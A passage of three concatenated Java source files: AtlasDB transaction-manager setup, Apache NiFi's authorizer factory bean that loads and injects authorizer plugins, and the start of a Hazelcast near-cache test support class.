import com.palantir.atlasdb.keyvalue.impl.SweepStatsKeyValueService;
import com.palantir.atlasdb.schema.SweepSchema;
import com.palantir.atlasdb.schema.generated.SweepTableFactory;
import com.palantir.atlasdb.spi.AtlasDbFactory;
import com.palantir.atlasdb.sweep.BackgroundSweeper;
import com.palantir.atlasdb.sweep.BackgroundSweeperImpl;
import com.palantir.atlasdb.sweep.SweepTaskRunner;
import com.palantir.atlasdb.sweep.SweepTaskRunnerImpl;
import com.palantir.atlasdb.table.description.Schema;
import com.palantir.atlasdb.table.description.Schemas;
import com.palantir.atlasdb.transaction.api.AtlasDbConstraintCheckingMode;
import com.palantir.atlasdb.transaction.api.TransactionManager;
import com.palantir.atlasdb.transaction.impl.ConflictDetectionManager;
import com.palantir.atlasdb.transaction.impl.ConflictDetectionManagers;
import com.palantir.atlasdb.transaction.impl.SerializableTransactionManager;
import com.palantir.atlasdb.transaction.impl.SnapshotTransactionManager;
import com.palantir.atlasdb.transaction.impl.SweepStrategyManager;
import com.palantir.atlasdb.transaction.impl.SweepStrategyManagers;
import com.palantir.atlasdb.transaction.service.TransactionService;
import com.palantir.atlasdb.transaction.service.TransactionServices;
import com.palantir.leader.LeaderElectionService;
import com.palantir.leader.proxy.AwaitingLeadershipProxy;
import com.palantir.lock.LockClient;
import com.palantir.lock.RemoteLockService;
import com.palantir.lock.client.LockRefreshingRemoteLockService;
import com.palantir.lock.impl.LockServiceImpl;
import com.palantir.timestamp.TimestampService;
public class TransactionManagers {
private static final Logger log = LoggerFactory.getLogger(TransactionManagers.class);
private static final ServiceLoader<AtlasDbFactory> loader = ServiceLoader.load(AtlasDbFactory.class);
/**
* Create a {@link SerializableTransactionManager} with provided configuration, {@link SSLSocketFactory}, {@link Schema},
* and an environment in which to register HTTP server endpoints.
*/
public static SerializableTransactionManager create(AtlasDbConfig config,
Optional<SSLSocketFactory> sslSocketFactory,
Schema schema,
Environment env) {
return create(config, sslSocketFactory, ImmutableSet.of(schema), env);
}
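    // Illustrative usage only (a sketch, not part of this class): a caller would typically
    // build the manager once at startup, e.g.
    //   SerializableTransactionManager txm = TransactionManagers.create(
    //       myConfig, Optional.<SSLSocketFactory>absent(), mySchema, myEnv);
    // where myConfig, mySchema, and myEnv are application-supplied values.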
/**
* Create a {@link SerializableTransactionManager} with provided configuration, {@link SSLSocketFactory}, a set of
* {@link Schema}s, and an environment in which to register HTTP server endpoints.
*/
public static SerializableTransactionManager create(AtlasDbConfig config,
Optional<SSLSocketFactory> sslSocketFactory,
Set<Schema> schemas,
Environment env) {
final AtlasDbFactory kvsFactory = getKeyValueServiceFactory(config.keyValueService().type());
final KeyValueService rawKvs = kvsFactory.createRawKeyValueService(config.keyValueService());
LockAndTimestampServices lts = createLockAndTimestampServices(config, sslSocketFactory, env,
new Supplier<RemoteLockService>() {
@Override
public RemoteLockService get() {
return LockServiceImpl.create();
}
},
new Supplier<TimestampService>() {
@Override
public TimestampService get() {
return kvsFactory.createTimestampService(rawKvs);
}
});
lts = ImmutableLockAndTimestampServices.builder()
.from(lts)
.lock(LockRefreshingRemoteLockService.create(lts.lock()))
.build();
KeyValueService kvs = NamespacedKeyValueServices.wrapWithStaticNamespaceMappingKvs(rawKvs);
kvs = new SweepStatsKeyValueService(kvs, lts.time());
SnapshotTransactionManager.createTables(kvs);
LockClient lockClient = LockClient.of("atlas instance");
TransactionService transactionService = TransactionServices.createTransactionService(kvs);
ConflictDetectionManager conflictManager = ConflictDetectionManagers.createDefault(kvs);
SweepStrategyManager sweepStrategyManager = SweepStrategyManagers.createDefault(kvs);
for (Schema schema : ImmutableSet.<Schema>builder().add(SweepSchema.INSTANCE.getLatestSchema()).addAll(schemas).build()) {
Schemas.createTablesAndIndexes(schema, kvs);
}
CleanupFollower follower = CleanupFollower.create(schemas);
Cleaner cleaner = new DefaultCleanerBuilder(
kvs,
lts.lock(),
lts.time(),
lockClient,
ImmutableList.of(follower),
transactionService)
.setBackgroundScrubAggressively(config.backgroundScrubAggressively())
.setBackgroundScrubBatchSize(config.getBackgroundScrubBatchSize())
.setBackgroundScrubFrequencyMillis(config.getBackgroundScrubFrequencyMillis())
.setBackgroundScrubThreads(config.getBackgroundScrubThreads())
.setPunchIntervalMillis(config.getPunchIntervalMillis())
.setTransactionReadTimeout(config.getTransactionReadTimeoutMillis())
.buildCleaner();
SerializableTransactionManager transactionManager = new SerializableTransactionManager(kvs,
lts.time(),
lockClient,
lts.lock(),
transactionService,
Suppliers.ofInstance(AtlasDbConstraintCheckingMode.FULL_CONSTRAINT_CHECKING_THROWS_EXCEPTIONS),
conflictManager,
sweepStrategyManager,
cleaner);
SweepTaskRunner sweepRunner = new SweepTaskRunnerImpl(
transactionManager,
kvs,
getUnreadableTsSupplier(transactionManager),
getImmutableTsSupplier(transactionManager),
transactionService,
sweepStrategyManager,
ImmutableList.<Follower>of(follower));
BackgroundSweeper backgroundSweeper = new BackgroundSweeperImpl(
transactionManager,
kvs,
sweepRunner,
Suppliers.ofInstance(config.enableSweep()),
Suppliers.ofInstance(config.getSweepPauseMillis()),
Suppliers.ofInstance(config.getSweepBatchSize()),
SweepTableFactory.of());
backgroundSweeper.runInBackground();
return transactionManager;
}
private static Supplier<Long> getImmutableTsSupplier(final TransactionManager txManager) {
return new Supplier<Long>() {
@Override
public Long get() {
return txManager.getImmutableTimestamp();
}
};
}
private static Supplier<Long> getUnreadableTsSupplier(final TransactionManager txManager) {
return new Supplier<Long>() {
@Override
public Long get() {
return txManager.getUnreadableTimestamp();
}
};
}
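    // Looks up, via ServiceLoader, the AtlasDbFactory whose type matches the configured
    // key-value service type (case-insensitively).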
private static AtlasDbFactory getKeyValueServiceFactory(String type) {
for (AtlasDbFactory factory : loader) {
if (factory.getType().equalsIgnoreCase(type)) {
return factory;
}
}
throw new IllegalStateException("No atlas provider for KeyValueService type " + type + " is on your classpath.");
}
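    // With leader election configured, the local lock/timestamp services are registered
    // behind AwaitingLeadershipProxy and remote proxies to the leader set are returned;
    // otherwise any explicitly configured remote endpoints are used, falling back to the
    // supplied embedded implementations.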
private static LockAndTimestampServices createLockAndTimestampServices(
AtlasDbConfig config,
Optional<SSLSocketFactory> sslSocketFactory,
Environment env,
Supplier<RemoteLockService> lock,
Supplier<TimestampService> time) {
if (config.leader().isPresent()) {
LeaderElectionService leader = Leaders.create(sslSocketFactory, env, config.leader().get());
env.register(AwaitingLeadershipProxy.newProxyInstance(RemoteLockService.class, lock, leader));
env.register(AwaitingLeadershipProxy.newProxyInstance(TimestampService.class, time, leader));
warnIf(config.lock().isPresent(), "Ignoring lock server configuration because leadership election is enabled");
warnIf(config.timestamp().isPresent(), "Ignoring timestamp server configuration because leadership election is enabled");
return ImmutableLockAndTimestampServices.builder()
.lock(createService(sslSocketFactory, config.leader().get().leaders(), RemoteLockService.class))
.time(createService(sslSocketFactory, config.leader().get().leaders(), TimestampService.class))
.build();
} else {
warnIf(config.lock().isPresent() != config.timestamp().isPresent(), "Using embedded instances for one (but not both) of lock and timestamp services");
return ImmutableLockAndTimestampServices.builder()
.lock(config.lock().transform(new ServiceCreator<>(sslSocketFactory, RemoteLockService.class)).or(lock))
.time(config.timestamp().transform(new ServiceCreator<>(sslSocketFactory, TimestampService.class)).or(time))
.build();
}
}
private static void warnIf(boolean arg, String warning) {
if (arg) {
log.warn(warning);
}
}
private static <T> T createService(Optional<SSLSocketFactory> sslSocketFactory, Set<String> uris, Class<T> serviceClass) {
return AtlasDbHttpClients.createProxyWithFailover(sslSocketFactory, uris, serviceClass);
}
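    // Builds a failover HTTP proxy for the given service interface from a ServerListConfig.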
private static class ServiceCreator<T> implements Function<ServerListConfig, T> {
private Optional<SSLSocketFactory> sslSocketFactory;
private Class<T> serviceClass;
public ServiceCreator(Optional<SSLSocketFactory> sslSocketFactory, Class<T> serviceClass) {
this.sslSocketFactory = sslSocketFactory;
this.serviceClass = serviceClass;
}
@Override
public T apply(ServerListConfig input) {
return createService(sslSocketFactory, input.servers(), serviceClass);
}
}
@Value.Immutable
interface LockAndTimestampServices {
RemoteLockService lock();
TimestampService time();
}
public interface Environment {
void register(Object resource);
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.nifi.authorization;
import java.io.File;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.xml.XMLConstants;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;
import javax.xml.stream.XMLStreamReader;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.apache.commons.lang3.StringUtils;
import org.apache.nifi.authorization.annotation.AuthorizerContext;
import org.apache.nifi.authorization.exception.AuthorizationAccessException;
import org.apache.nifi.authorization.exception.AuthorizerCreationException;
import org.apache.nifi.authorization.exception.AuthorizerDestructionException;
import org.apache.nifi.authorization.generated.Authorizers;
import org.apache.nifi.authorization.generated.Property;
import org.apache.nifi.bundle.Bundle;
import org.apache.nifi.nar.ExtensionManager;
import org.apache.nifi.security.xml.XmlUtils;
import org.apache.nifi.util.NiFiProperties;
import org.apache.nifi.util.file.classloader.ClassLoaderUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.DisposableBean;
import org.springframework.beans.factory.FactoryBean;
import org.xml.sax.SAXException;
/**
* Factory bean for loading the configured authorizer.
*/
public class AuthorizerFactoryBean implements FactoryBean, DisposableBean, UserGroupProviderLookup, AccessPolicyProviderLookup, AuthorizerLookup {
private static final Logger logger = LoggerFactory.getLogger(AuthorizerFactoryBean.class);
private static final String AUTHORIZERS_XSD = "/authorizers.xsd";
private static final String JAXB_GENERATED_PATH = "org.apache.nifi.authorization.generated";
private static final JAXBContext JAXB_CONTEXT = initializeJaxbContext();
/**
* Load the JAXBContext.
*/
private static JAXBContext initializeJaxbContext() {
try {
return JAXBContext.newInstance(JAXB_GENERATED_PATH, AuthorizerFactoryBean.class.getClassLoader());
} catch (JAXBException e) {
            throw new RuntimeException("Unable to create JAXBContext.", e);
}
}
private Authorizer authorizer;
private NiFiProperties properties;
private final Map<String, UserGroupProvider> userGroupProviders = new HashMap<>();
private final Map<String, AccessPolicyProvider> accessPolicyProviders = new HashMap<>();
private final Map<String, Authorizer> authorizers = new HashMap<>();
@Override
public UserGroupProvider getUserGroupProvider(String identifier) {
return userGroupProviders.get(identifier);
}
@Override
public AccessPolicyProvider getAccessPolicyProvider(String identifier) {
return accessPolicyProviders.get(identifier);
}
@Override
public Authorizer getAuthorizer(String identifier) {
return authorizers.get(identifier);
}
@Override
public Object getObject() throws Exception {
if (authorizer == null) {
if (properties.getSslPort() == null) {
                // use a default authorizer... only allowed when not running securely
authorizer = createDefaultAuthorizer();
} else {
// look up the authorizer to use
final String authorizerIdentifier = properties.getProperty(NiFiProperties.SECURITY_USER_AUTHORIZER);
// ensure the authorizer class name was specified
if (StringUtils.isBlank(authorizerIdentifier)) {
throw new Exception("When running securely, the authorizer identifier must be specified in the nifi properties file.");
} else {
final Authorizers authorizerConfiguration = loadAuthorizersConfiguration();
// create each user group provider
for (final org.apache.nifi.authorization.generated.UserGroupProvider userGroupProvider : authorizerConfiguration.getUserGroupProvider()) {
userGroupProviders.put(userGroupProvider.getIdentifier(), createUserGroupProvider(userGroupProvider.getIdentifier(), userGroupProvider.getClazz()));
}
// configure each user group provider
for (final org.apache.nifi.authorization.generated.UserGroupProvider provider : authorizerConfiguration.getUserGroupProvider()) {
final UserGroupProvider instance = userGroupProviders.get(provider.getIdentifier());
instance.onConfigured(loadAuthorizerConfiguration(provider.getIdentifier(), provider.getProperty()));
}
// create each access policy provider
for (final org.apache.nifi.authorization.generated.AccessPolicyProvider accessPolicyProvider : authorizerConfiguration.getAccessPolicyProvider()) {
accessPolicyProviders.put(accessPolicyProvider.getIdentifier(), createAccessPolicyProvider(accessPolicyProvider.getIdentifier(), accessPolicyProvider.getClazz()));
}
// configure each access policy provider
for (final org.apache.nifi.authorization.generated.AccessPolicyProvider provider : authorizerConfiguration.getAccessPolicyProvider()) {
final AccessPolicyProvider instance = accessPolicyProviders.get(provider.getIdentifier());
instance.onConfigured(loadAuthorizerConfiguration(provider.getIdentifier(), provider.getProperty()));
}
// create each authorizer
for (final org.apache.nifi.authorization.generated.Authorizer authorizer : authorizerConfiguration.getAuthorizer()) {
authorizers.put(authorizer.getIdentifier(), createAuthorizer(authorizer.getIdentifier(), authorizer.getClazz(),authorizer.getClasspath()));
}
// configure each authorizer
for (final org.apache.nifi.authorization.generated.Authorizer provider : authorizerConfiguration.getAuthorizer()) {
final Authorizer instance = authorizers.get(provider.getIdentifier());
instance.onConfigured(loadAuthorizerConfiguration(provider.getIdentifier(), provider.getProperty()));
}
// get the authorizer instance
authorizer = getAuthorizer(authorizerIdentifier);
// ensure it was found
if (authorizer == null) {
throw new Exception(String.format("The specified authorizer '%s' could not be found.", authorizerIdentifier));
}
}
}
}
return authorizer;
}
private Authorizers loadAuthorizersConfiguration() throws Exception {
final File authorizersConfigurationFile = properties.getAuthorizerConfigurationFile();
// load the authorizers from the specified file
if (authorizersConfigurationFile.exists()) {
try {
// find the schema
final SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
final Schema schema = schemaFactory.newSchema(Authorizers.class.getResource(AUTHORIZERS_XSD));
// attempt to unmarshal
final XMLStreamReader xsr = XmlUtils.createSafeReader(new StreamSource(authorizersConfigurationFile));
final Unmarshaller unmarshaller = JAXB_CONTEXT.createUnmarshaller();
unmarshaller.setSchema(schema);
final JAXBElement<Authorizers> element = unmarshaller.unmarshal(xsr, Authorizers.class);
return element.getValue();
} catch (SAXException | JAXBException e) {
throw new Exception("Unable to load the authorizer configuration file at: " + authorizersConfigurationFile.getAbsolutePath(), e);
}
} else {
throw new Exception("Unable to find the authorizer configuration file at " + authorizersConfigurationFile.getAbsolutePath());
}
}
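    /**
     * Instantiates the configured user group provider from its bundle's class loader,
     * performs context injection, initializes it, and wraps it with the NAR class loader.
     */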
private UserGroupProvider createUserGroupProvider(final String identifier, final String userGroupProviderClassName) throws Exception {
// get the classloader for the specified user group provider
final List<Bundle> userGroupProviderBundles = ExtensionManager.getBundles(userGroupProviderClassName);
if (userGroupProviderBundles.size() == 0) {
throw new Exception(String.format("The specified user group provider class '%s' is not known to this nifi.", userGroupProviderClassName));
}
if (userGroupProviderBundles.size() > 1) {
throw new Exception(String.format("Multiple bundles found for the specified user group provider class '%s', only one is allowed.", userGroupProviderClassName));
}
final Bundle userGroupProviderBundle = userGroupProviderBundles.get(0);
final ClassLoader userGroupProviderClassLoader = userGroupProviderBundle.getClassLoader();
// get the current context classloader
final ClassLoader currentClassLoader = Thread.currentThread().getContextClassLoader();
final UserGroupProvider instance;
try {
// set the appropriate class loader
Thread.currentThread().setContextClassLoader(userGroupProviderClassLoader);
// attempt to load the class
Class<?> rawUserGroupProviderClass = Class.forName(userGroupProviderClassName, true, userGroupProviderClassLoader);
Class<? extends UserGroupProvider> userGroupProviderClass = rawUserGroupProviderClass.asSubclass(UserGroupProvider.class);
            // create a new instance
Constructor constructor = userGroupProviderClass.getConstructor();
instance = (UserGroupProvider) constructor.newInstance();
// method injection
performMethodInjection(instance, userGroupProviderClass);
// field injection
performFieldInjection(instance, userGroupProviderClass);
// call post construction lifecycle event
instance.initialize(new StandardAuthorizerInitializationContext(identifier, this, this, this));
} finally {
if (currentClassLoader != null) {
Thread.currentThread().setContextClassLoader(currentClassLoader);
}
}
return UserGroupProviderFactory.withNarLoader(instance, userGroupProviderClassLoader);
}
private AccessPolicyProvider createAccessPolicyProvider(final String identifier, final String accessPolicyProviderClassName) throws Exception {
// get the classloader for the specified access policy provider
final List<Bundle> accessPolicyProviderBundles = ExtensionManager.getBundles(accessPolicyProviderClassName);
if (accessPolicyProviderBundles.size() == 0) {
throw new Exception(String.format("The specified access policy provider class '%s' is not known to this nifi.", accessPolicyProviderClassName));
}
if (accessPolicyProviderBundles.size() > 1) {
throw new Exception(String.format("Multiple bundles found for the specified access policy provider class '%s', only one is allowed.", accessPolicyProviderClassName));
}
final Bundle accessPolicyProviderBundle = accessPolicyProviderBundles.get(0);
final ClassLoader accessPolicyProviderClassLoader = accessPolicyProviderBundle.getClassLoader();
// get the current context classloader
final ClassLoader currentClassLoader = Thread.currentThread().getContextClassLoader();
final AccessPolicyProvider instance;
try {
// set the appropriate class loader
Thread.currentThread().setContextClassLoader(accessPolicyProviderClassLoader);
// attempt to load the class
Class<?> rawAccessPolicyProviderClass = Class.forName(accessPolicyProviderClassName, true, accessPolicyProviderClassLoader);
Class<? extends AccessPolicyProvider> accessPolicyClass = rawAccessPolicyProviderClass.asSubclass(AccessPolicyProvider.class);
            // create a new instance
Constructor constructor = accessPolicyClass.getConstructor();
instance = (AccessPolicyProvider) constructor.newInstance();
// method injection
performMethodInjection(instance, accessPolicyClass);
// field injection
performFieldInjection(instance, accessPolicyClass);
// call post construction lifecycle event
instance.initialize(new StandardAuthorizerInitializationContext(identifier, this, this, this));
} finally {
if (currentClassLoader != null) {
Thread.currentThread().setContextClassLoader(currentClassLoader);
}
}
return AccessPolicyProviderFactory.withNarLoader(instance, accessPolicyProviderClassLoader);
}
private Authorizer createAuthorizer(final String identifier, final String authorizerClassName, final String classpathResources) throws Exception {
// get the classloader for the specified authorizer
final List<Bundle> authorizerBundles = ExtensionManager.getBundles(authorizerClassName);
if (authorizerBundles.size() == 0) {
throw new Exception(String.format("The specified authorizer class '%s' is not known to this nifi.", authorizerClassName));
}
if (authorizerBundles.size() > 1) {
throw new Exception(String.format("Multiple bundles found for the specified authorizer class '%s', only one is allowed.", authorizerClassName));
}
final Bundle authorizerBundle = authorizerBundles.get(0);
ClassLoader authorizerClassLoader = authorizerBundle.getClassLoader();
// get the current context classloader
final ClassLoader currentClassLoader = Thread.currentThread().getContextClassLoader();
final Authorizer instance;
try {
// set the appropriate class loader
Thread.currentThread().setContextClassLoader(authorizerClassLoader);
// attempt to load the class
Class<?> rawAuthorizerClass = Class.forName(authorizerClassName, true, authorizerClassLoader);
Class<? extends Authorizer> authorizerClass = rawAuthorizerClass.asSubclass(Authorizer.class);
            // create a new instance
Constructor constructor = authorizerClass.getConstructor();
instance = (Authorizer) constructor.newInstance();
// method injection
performMethodInjection(instance, authorizerClass);
// field injection
performFieldInjection(instance, authorizerClass);
// call post construction lifecycle event
instance.initialize(new StandardAuthorizerInitializationContext(identifier, this, this, this));
} finally {
if (currentClassLoader != null) {
Thread.currentThread().setContextClassLoader(currentClassLoader);
}
}
if (StringUtils.isNotEmpty(classpathResources)) {
URL[] urls = ClassLoaderUtils.getURLsForClasspath(classpathResources, null, true);
authorizerClassLoader = new URLClassLoader(urls, authorizerClassLoader);
}
return AuthorizerFactory.installIntegrityChecks(AuthorizerFactory.withNarLoader(instance, authorizerClassLoader));
}
private AuthorizerConfigurationContext loadAuthorizerConfiguration(final String identifier, final List<Property> properties) {
final Map<String, String> authorizerProperties = new HashMap<>();
for (final Property property : properties) {
authorizerProperties.put(property.getName(), property.getValue());
}
return new StandardAuthorizerConfigurationContext(identifier, authorizerProperties);
}
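    /**
     * Invokes single-argument setters annotated with {@link AuthorizerContext}, injecting
     * well-known types such as {@link NiFiProperties}; recurses into superclasses that
     * implement {@link Authorizer}.
     */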
private void performMethodInjection(final Object instance, final Class authorizerClass) throws IllegalAccessException, IllegalArgumentException, InvocationTargetException {
for (final Method method : authorizerClass.getMethods()) {
if (method.isAnnotationPresent(AuthorizerContext.class)) {
// make the method accessible
final boolean isAccessible = method.isAccessible();
method.setAccessible(true);
try {
final Class<?>[] argumentTypes = method.getParameterTypes();
// look for setters (single argument)
if (argumentTypes.length == 1) {
final Class<?> argumentType = argumentTypes[0];
// look for well known types
if (NiFiProperties.class.isAssignableFrom(argumentType)) {
// nifi properties injection
method.invoke(instance, properties);
}
}
} finally {
method.setAccessible(isAccessible);
}
}
}
final Class parentClass = authorizerClass.getSuperclass();
if (parentClass != null && Authorizer.class.isAssignableFrom(parentClass)) {
performMethodInjection(instance, parentClass);
}
}
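    /**
     * Sets still-null fields annotated with {@link AuthorizerContext}, injecting well-known
     * types such as {@link NiFiProperties}; recurses into superclasses that implement
     * {@link Authorizer}.
     */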
private void performFieldInjection(final Object instance, final Class authorizerClass) throws IllegalArgumentException, IllegalAccessException {
for (final Field field : authorizerClass.getDeclaredFields()) {
if (field.isAnnotationPresent(AuthorizerContext.class)) {
                // make the field accessible
final boolean isAccessible = field.isAccessible();
field.setAccessible(true);
try {
// get the type
final Class<?> fieldType = field.getType();
// only consider this field if it isn't set yet
if (field.get(instance) == null) {
// look for well known types
if (NiFiProperties.class.isAssignableFrom(fieldType)) {
// nifi properties injection
field.set(instance, properties);
}
}
} finally {
field.setAccessible(isAccessible);
}
}
}
final Class parentClass = authorizerClass.getSuperclass();
if (parentClass != null && Authorizer.class.isAssignableFrom(parentClass)) {
performFieldInjection(instance, parentClass);
}
}
/**
* @return a default Authorizer to use when running unsecurely with no authorizer configured
*/
private Authorizer createDefaultAuthorizer() {
return new Authorizer() {
@Override
public AuthorizationResult authorize(final AuthorizationRequest request) throws AuthorizationAccessException {
return AuthorizationResult.approved();
}
@Override
public void initialize(AuthorizerInitializationContext initializationContext) throws AuthorizerCreationException {
}
@Override
public void onConfigured(AuthorizerConfigurationContext configurationContext) throws AuthorizerCreationException {
}
@Override
public void preDestruction() throws AuthorizerDestructionException {
}
};
}
@Override
public Class getObjectType() {
return Authorizer.class;
}
@Override
public boolean isSingleton() {
return true;
}
@Override
public void destroy() throws Exception {
if (authorizer != null) {
authorizer.preDestruction();
}
}
public void setProperties(NiFiProperties properties) {
this.properties = properties;
}
}
|
|
/*
* Copyright (c) 2008-2018, Hazelcast, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hazelcast.internal.nearcache;
import com.hazelcast.config.InMemoryFormat;
import com.hazelcast.config.NearCacheConfig;
import com.hazelcast.core.HazelcastInstance;
import com.hazelcast.internal.adapter.DataStructureAdapter;
import com.hazelcast.internal.nearcache.impl.invalidation.StaleReadDetector;
import com.hazelcast.monitor.NearCacheStats;
import com.hazelcast.monitor.impl.NearCacheStatsImpl;
import com.hazelcast.nio.serialization.Data;
import com.hazelcast.spi.ExecutionService;
import com.hazelcast.spi.serialization.SerializationService;
import com.hazelcast.test.AssertTask;
import org.junit.Before;
import java.util.HashMap;
import java.util.Map;
import static com.hazelcast.config.NearCacheConfig.DEFAULT_MEMORY_FORMAT;
import static com.hazelcast.internal.nearcache.NearCache.DEFAULT_EXPIRATION_TASK_INITIAL_DELAY_IN_SECONDS;
import static com.hazelcast.internal.nearcache.NearCacheRecord.NOT_RESERVED;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
@SuppressWarnings("WeakerAccess")
public abstract class NearCacheTestSupport extends CommonNearCacheTestSupport {
protected SerializationService ss;
protected ExecutionService executionService;
@Before
public void setUp() throws Exception {
HazelcastInstance instance = createHazelcastInstance();
ss = getSerializationService(instance);
executionService = getNodeEngineImpl(instance).getExecutionService();
}
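    /**
     * Subclasses supply the concrete {@link NearCache} implementation under test, wired to
     * the given record store so delegation can be asserted.
     */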
protected abstract NearCache<Integer, String> createNearCache(String name, NearCacheConfig nearCacheConfig,
ManagedNearCacheRecordStore nearCacheRecordStore);
protected NearCache<Integer, String> createNearCache(String name, ManagedNearCacheRecordStore nearCacheRecordStore) {
return createNearCache(name, createNearCacheConfig(name, DEFAULT_MEMORY_FORMAT), nearCacheRecordStore);
}
protected Map<Integer, String> generateRandomKeyValueMappings() {
Map<Integer, String> expectedKeyValueMappings = new HashMap<Integer, String>();
for (int i = 0; i < DEFAULT_RECORD_COUNT; i++) {
expectedKeyValueMappings.put(i, "Record-" + i);
}
return expectedKeyValueMappings;
}
protected ManagedNearCacheRecordStore createManagedNearCacheRecordStore(
Map<Integer, String> expectedKeyValueMappings) {
return new ManagedNearCacheRecordStore(expectedKeyValueMappings);
}
protected ManagedNearCacheRecordStore createManagedNearCacheRecordStore() {
return new ManagedNearCacheRecordStore(generateRandomKeyValueMappings());
}
protected void doGetNearCacheName() {
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, createManagedNearCacheRecordStore());
assertEquals(DEFAULT_NEAR_CACHE_NAME, nearCache.getName());
}
protected void doGetFromNearCache() {
Map<Integer, String> expectedKeyValueMappings = generateRandomKeyValueMappings();
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore(expectedKeyValueMappings);
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache delegates get call to wrapped NearCacheRecordStore
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
for (int i = 0; i < expectedKeyValueMappings.size(); i++) {
String value = nearCache.get(i);
assertEquals((Integer) i, managedNearCacheRecordStore.latestKeyOnGet);
assertEquals(value, managedNearCacheRecordStore.latestValueOnGet);
}
}
protected void doPutToNearCache() {
Map<Integer, String> expectedKeyValueMappings = new HashMap<Integer, String>();
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore(expectedKeyValueMappings);
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache delegates put call to wrapped NearCacheRecordStore
for (int i = 0; i < DEFAULT_RECORD_COUNT; i++) {
String value = "Record-" + i;
nearCache.put(i, null, value);
assertEquals((Integer) i, managedNearCacheRecordStore.latestKeyOnPut);
assertEquals(value, managedNearCacheRecordStore.latestValueOnPut);
}
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
}
protected void doRemoveFromNearCache() {
Map<Integer, String> expectedKeyValueMappings = generateRandomKeyValueMappings();
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore(expectedKeyValueMappings);
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache delegates remove call to wrapped NearCacheRecordStore
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
for (int i = 0; i < 2 * DEFAULT_RECORD_COUNT; i++) {
nearCache.remove(i);
assertEquals((Integer) i, managedNearCacheRecordStore.latestKeyOnRemove);
assertEquals(i < DEFAULT_RECORD_COUNT, managedNearCacheRecordStore.latestResultOnRemove);
}
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
}
protected void doInvalidateFromNearCache() {
Map<Integer, String> expectedKeyValueMappings = generateRandomKeyValueMappings();
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore(expectedKeyValueMappings);
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache delegates invalidate call to wrapped NearCacheRecordStore
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
for (int i = 0; i < 2 * DEFAULT_RECORD_COUNT; i++) {
nearCache.invalidate(i);
assertEquals((Integer) i, managedNearCacheRecordStore.latestKeyOnRemove);
assertEquals(i < DEFAULT_RECORD_COUNT, managedNearCacheRecordStore.latestResultOnRemove);
}
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
}
protected void doClearNearCache() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
assertFalse(managedNearCacheRecordStore.clearCalled);
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
nearCache.clear();
// show that NearCache delegates clear call to wrapped NearCacheRecordStore
assertTrue(managedNearCacheRecordStore.clearCalled);
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
}
protected void doDestroyNearCache() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
assertFalse(managedNearCacheRecordStore.destroyCalled);
nearCache.destroy();
// show that NearCache delegates destroy call to wrapped NearCacheRecordStore
assertTrue(managedNearCacheRecordStore.destroyCalled);
}
protected void doConfigureInMemoryFormatForNearCache() {
NearCacheConfig config1 = createNearCacheConfig(DEFAULT_NEAR_CACHE_NAME + "-1", DEFAULT_MEMORY_FORMAT);
NearCacheConfig config2 = createNearCacheConfig(DEFAULT_NEAR_CACHE_NAME + "-2", DEFAULT_MEMORY_FORMAT);
config1.setInMemoryFormat(InMemoryFormat.OBJECT);
